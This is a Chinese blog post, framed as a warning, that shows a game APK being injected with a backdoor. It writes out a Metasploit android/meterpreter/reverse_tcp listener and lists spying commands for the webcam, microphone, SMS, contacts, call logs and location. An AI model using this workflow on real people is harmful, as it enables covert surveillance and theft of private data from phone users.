安卓渗透测试

"linux"

Posted by yangsir on April 6, 2024

“记一次安卓渗透测试”

实验环境:

ip 操作系统
192.168.1.116 linux

向安卓软件.APK中注入后门

注意:此文章只分享部分步骤,仅用来警示部分朋友的无视风险安装

安卓客户端渗透目前来说已经是CTF中的一个非常重要的分类了,但是通常的它更多的是二进制层面的博弈,如果仅仅是在apk中注入后门可能非常简单,但通常需要的是一系列的攻击手段来辅助完成 的。所以这里仅做简单介绍,并不深入研究。

禁用ipv6

1
2
3
4
5
echo "net.ipv6.conf.eth0.disable_ipv6 = 1" >> /etc/sysctl.conf 

sysctl -p 

ifconfig 

image-20240406204819875

安装逆向工具

image-20240406205125178

解压安装

上传游戏安装包,游戏名为 禁锢坦克

image-20240406205608521

检查并安装依赖

image-20240406205931704

进入逆向工具

image-20240406210149375

开始对apk注入后门

image-20240406210425487

生成一个密钥,编译apk程序所需。

image-20240406210625118

生成带有后门的APK程序

image-20240406223856283

手动启动侦听

1
2
3
4
5
6
msfdb run 
use exploit/multi/handler 
set PAYLOAD android/meterpreter/reverse_tcp 
set lhost 192.168.1.53 
set lport 4444 
exploit

手机安装运行APP即可建立session

image-20240406224756553

双击启动

image-20240406224859446

image-20240406224923307成功建立连接

常用命令解释

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
Stdapi: Webcam Commands 
=================================== 
webcam_list  列出网络摄像头 
record_mic [ˈrekərd]/记录/  从默认麦克风录制音频为X秒 
webcam_chat  开始视频聊天 
webcam_snap  从指定的摄像头获取快照 
webcam_stream -i 1  从指定的网络摄像头播放视频流[选择后摄像头] 
Android Commands 
================= 
activity_start  从 URI 字符串启动Android活动 
check_root  检查设备是否有根 
dump_calllog  获取调用日志 
dump_contacts  获取联系人列表 
dump_sms  获取短信 
geolocate  利用地理定位获取当前LAT 
wlan_geolocate  利用 WLAN信息获取当前LAT
hide_app_icon  从发射器隐藏应用程序图标 
interval_collect  管理区间收集能力 
send_sms  从目标会话发送短消息 
set_audio_mode  
sqlite_query  从存储库查询SQLite数据库 
wakelock  启用/禁用Wakelock 

废话不多说我们直接拍个照。

image-20240406225301712

兄弟们 不要无视风险安装不明来源的软件了!!!!